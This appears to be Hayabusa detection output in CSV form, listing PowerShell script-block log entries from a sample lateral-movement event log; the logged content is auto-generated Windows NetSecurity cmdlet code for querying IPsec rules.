($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Servers')) { [object]$__cmdletization_value = ${Servers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Domains')) { [object]$__cmdletization_value = ${Domains} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AddressType')) { [object]$__cmdletization_value = ${AddressType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Servers')) { [object]$__cmdletization_value = ${Servers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Domains')) { [object]$__cmdletization_value = ${Domains} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AddressType')) { [object]$__cmdletization_value = ${AddressType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DnsServers')) { [object]$__cmdletization_value = ${DnsServers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 